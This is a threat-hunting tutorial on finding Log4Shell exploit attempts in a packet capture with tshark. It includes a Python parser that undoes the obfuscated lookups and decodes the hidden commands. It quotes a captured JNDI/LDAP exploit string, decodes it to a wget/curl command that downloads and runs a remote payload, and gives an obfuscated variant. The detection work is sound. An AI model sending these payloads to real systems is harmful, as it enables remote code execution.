If you read my previous article, Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel, you will remember that we used Splunk as the platform to hunt for events and logs related to the Log4j vulnerability.
This time we are using RSA Netwitness, and we will hunt for Log4Shell attempts in a pcap.
If you have never seen the RSA Netwitness interface, here is a screenshot of the tool:
Once you have exported the pcap, we can use tshark to extract the fields we want from the matching requests.
The tshark command and display filter we will use:
"C:\Program Files\Wireshark\tshark.exe" -r your_pcap.pcap -Y "ip contains Base64 && http.request && ip contains jndi" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.user_agent -e http.referer -E header=y -E separator=; > out.txt
A caveat on the filter: `contains` is a case-sensitive byte match over the whole IP packet, so this only finds HTTP requests that carry the literal strings "jndi" and "Base64". Obfuscated variants such as ${${lower:j}ndi:...}, uppercase "JNDI", or payloads that do not use the /Base64/ command form will not match and need a looser filter (for example `http.request && ip matches "(?i)jndi"`) or a second pass over the decoded fields.
Example of the output (one header row, then one row per matching request; the victim address is masked as X.X.X.X):
ip.src tcp.srcport ip.dst tcp.dstport http.request.method http.request.uri http.response.code http.user_agent http.referer
143.244.156.104 37058 X.X.X.X 8080 GET / ${jndi:ldap://135.148.132.224:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY3VybCAtTyBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY2htb2QgNzc3IHB5OyAuL3B5IHJjZS54ODY=}
Decoding the Base64 string after /Base64/ gives the command the attacker's LDAP server would have the victim run:
wget http://152[.]67[.]63[.]150/py; curl -O http://152[.]67[.]63[.]150/py; chmod 777 py; ./py rce.x86
It downloads a file named py (trying wget first and curl as a fallback), makes it executable, and runs it with the argument rce.x86. The callback host (135.148.132.224:1389) and the payload host (152.67.63.150) are the two indicators worth pivoting on in the rest of the pcap.
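To turn the manual decode above into something repeatable, here is an added Python example (my own code, not from the original article or from RSA) that reads the ';'-separated out.txt produced by the tshark command, finds the ${jndi:...} lookup in any exported field, decodes the /Base64/ command, and pulls out the callback and payload-download indicators. The sample input is constructed: the first row is the hit from this page with the payload placed in the User-Agent column (an assumption, since the flattened output does not say which header carried it), and the other two rows, on TEST-NET addresses, are made up to show a benign request and an obfuscated ${${lower:j}...} variant that the page's byte-match filter would miss. The de-obfuscation step goes beyond the page's single case by resolving the ${lower:}, ${upper:} and ${...:-x} lookups commonly used to hide the string "jndi".

```python
import base64
import csv
import io
import re

# Constructed sample in the layout produced by the tshark command on this page
# (-T fields -E header=y -E separator=;). Row 1 is the page's hit (victim masked
# as X.X.X.X, payload assumed to be in User-Agent); rows 2 and 3 are invented.
SAMPLE_TSHARK_OUTPUT = (
    "ip.src;tcp.srcport;ip.dst;tcp.dstport;http.request.method;http.request.uri;"
    "http.response.code;http.user_agent;http.referer\n"
    "143.244.156.104;37058;X.X.X.X;8080;GET;/;;${jndi:ldap://135.148.132.224:1389"
    "/Basic/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY3VybCAtTyBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY2htb2QgNzc3IHB5OyAuL3B5IHJjZS54ODY=};\n"
    "10.0.0.5;51234;X.X.X.X;8080;GET;/index.html;200;Mozilla/5.0;\n"
    "198.51.100.7;40001;X.X.X.X;8080;GET;/;;${${lower:j}${upper:n}di:${::-l}dap://"
    "203.0.113.9:1389/Basic/Command/Base64/aWQ=};\n"
)

# Nested lookups used to hide the literal "jndi" from byte-match filters:
# ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} -> X (default-value form).
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?(?P<path>[^}\s]*)\}",
    re.I,
)
_URL = re.compile(r"https?://[^\s;'\"]+")


def deobfuscate(value: str) -> str:
    """Resolve innermost ${lower:}/${upper:}/${:-} lookups until nothing changes."""
    previous = None
    while previous != value:
        previous = value
        value = _LOWER.sub(lambda m: m.group(1).lower(), value)
        value = _UPPER.sub(lambda m: m.group(1).upper(), value)
        value = _DEFAULT.sub(lambda m: m.group(1), value)
    return value


def decode_base64_command(path: str):
    """Decode the command hidden after /Base64/ in a JNDI exploit path, or None."""
    m = re.search(r"/Base64/([A-Za-z0-9+/=]+)", path)
    if not m:
        return None
    b64 = m.group(1)
    try:
        # Some payloads drop the trailing padding; restore it before decoding.
        return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-8", "replace")
    except ValueError:
        return None


def analyse_tshark_output(text: str) -> list:
    """Scan every exported field of every row for a JNDI lookup; describe each hit."""
    hits = []
    for row in csv.DictReader(io.StringIO(text), delimiter=";"):
        for field, value in row.items():
            if not field or not value:
                continue
            for m in _JNDI.finditer(deobfuscate(value)):
                command = decode_base64_command(m.group("path"))
                port = m.group("port")
                hits.append({
                    "src": row["ip.src"],
                    "dst": f"{row['ip.dst']}:{row['tcp.dstport']}",
                    "field": field,
                    "callback": f"{m.group('scheme').lower()}://{m.group('host')}"
                                + (f":{port}" if port else ""),
                    "command": command,
                    # Second-stage download hosts, deduplicated (the page's sample
                    # fetches the same URL twice, with wget and then curl).
                    "payload_urls": sorted(set(_URL.findall(command))) if command else [],
                })
    return hits


def defang(s: str) -> str:
    """Make an indicator safe to paste into a report: 1.2.3.4 -> 1[.]2[.]3[.]4."""
    return s.replace(".", "[.]")


if __name__ == "__main__":
    for hit in analyse_tshark_output(SAMPLE_TSHARK_OUTPUT):
        print(f"{hit['src']} -> {hit['dst']} via {hit['field']}")
        print(f"  callback : {defang(hit['callback'])}")
        print(f"  command  : {hit['command']}")
        for url in hit["payload_urls"]:
            print(f"  payload  : {defang(url)}")
```

Run it against the real out.txt by replacing SAMPLE_TSHARK_OUTPUT with the file contents; because it scans every exported column rather than only the URI, it catches the lookup whether it arrived in the User-Agent, Referer, or request path, and the callback and payload hosts it prints are the values to pivot on (DNS, outbound LDAP on 1389, HTTP GETs for /py) in the rest of the capture.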